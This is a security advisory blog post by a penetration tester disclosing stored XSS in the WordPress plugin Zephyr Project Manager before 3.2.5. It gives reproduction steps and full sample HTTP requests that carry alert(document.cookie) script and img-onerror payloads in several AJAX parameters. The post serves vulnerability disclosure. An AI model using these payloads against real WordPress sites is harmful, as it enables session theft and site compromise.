Open in app

Sign in

Write

Sign in

Wordpress Plugin Zephyr Project Manager < 3.2.5 — Unauthorised AJAX Calls To Stored XSS

Rizacan Tufan
2 min readOct 3, 2023

--

Description

Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.

It has been determined that in most places throughout the application, the data from the input field can be injected as html without any sanitization and validation.

The details of the discovery are given below.

Proof of Concept (PoC)

The details of the various (Reflected and Stored) XSS on the application are given below.

Endpoint Of New Discussion For Task. (Stored XSS)

Steps To Reproduce :

  1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
  2. Click on Discussion tab.
  3. Fill in payload in the comment field.
  4. Click on “Comment”.

Sample Request :

POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 108
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id=1&subject=task&subject_id=213&message=%3cscript%3ealert(document.cookie)%3c%2fscript%3e&type=message&action=zpm_send_comment&zpm_nonce=22858bf3a7

Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e

Parameter(s) : message

Endpoint Of New Team and Team Update. (Stored XSS)

Steps To Reproduce :

  1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
  2. Click on “New Team” or “Edit Team”.
  3. Fill in payload in the team name and team description field.
  4. Click on “Create Team”.

Sample Request :

POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&description=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&action=zpm_add_team

Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e

Parameter(s) : name,description

Endpoint Of User Access (Stored XSS)

Steps To Reproduce :

  1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
  2. Click on “Bulk Edit Access”.
  3. Choose any options.
  4. Click on “Allow Access”.
  5. “access” parameter is intervened by proxy.
  6. Click on “Create Team”.

Sample Request :

POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1103
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id%5B0%5D%5Bid%5D=1&user_id%5B0%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B0%5D%5Bname%5D=admin&user_id%5B0%5D%5Bdescription%5D=&user_id%5B0%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B0%5D%5Bcan_zephyr%5D=true&user_id%5B1%5D%5Bid%5D=1&user_id%5B1%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B1%5D%5Bname%5D=admin&user_id%5B1%5D%5Bdescription%5D=&user_id%5B1%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B1%5D%5Bcan_zephyr%5D=true&access=trueo6c2i%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3eb6lt4&action=zpm_update_user_access

Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e

Parameter(s) : access

References

WordPress
Exploit Db
Wpscan
Stored Xss
Reflected Xss

--

--

Rizacan Tufan

Written by Rizacan Tufan

0 Followers

Penetration Tester

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams